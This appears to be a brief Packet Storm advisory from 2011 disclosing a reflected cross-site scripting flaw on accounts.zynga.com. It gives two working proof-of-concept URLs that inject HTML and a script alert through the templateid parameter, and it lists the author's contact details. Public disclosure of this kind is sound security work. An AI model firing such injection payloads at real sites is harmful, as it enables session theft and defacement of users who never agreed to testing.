The accounts.zynga.com site suffers from a cross site scripting vulnerability.
cb844ad91bec5e440dbecccfc1b6571b8785726efc82a33375e8e1d1399bd7c6 _______ ________________ __ _____________
_______ \ _ \ \ _ \______ \ | _/_ \______ \ __ _ __
\_ __ \/ /_\ \/ /_\ \ / / |/ /| | / / ______ \ \/ \/ /
| | \/\ \_/ \ \_/ \/ /| < | | / / /_____/ \ /
|__| \_____ /\_____ /____/ |__|_ \|___| /____/ \/\_/
\/ \/ \/
-------------------------------------------------------------------------------------------------------------------------------------------------
Title: Zynga (accounts)Cross site scripting vulnerability
vendor: www.zynga.com
Author: Raghavendra Karthik D (r007k17-w)
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork:© 2011 Zynga, Inc
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* Cross Site Scripting vulnerability
Demo:
1.HTML injection:
http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cfont%20size=22%20name=calibri%3EXSS%20BUG%20DETECTED!!%20%3C/font%3E
2.JavaScript injection:
http://accounts.zynga.com/?game=&unsub=11046&templateid=%22%3E%3Cscript%3Ealert%28%22XSSed_by_Raghavendra_Karthik_D%22%29%3C/script%3E
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts and 3psilonlambda and all my friends.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed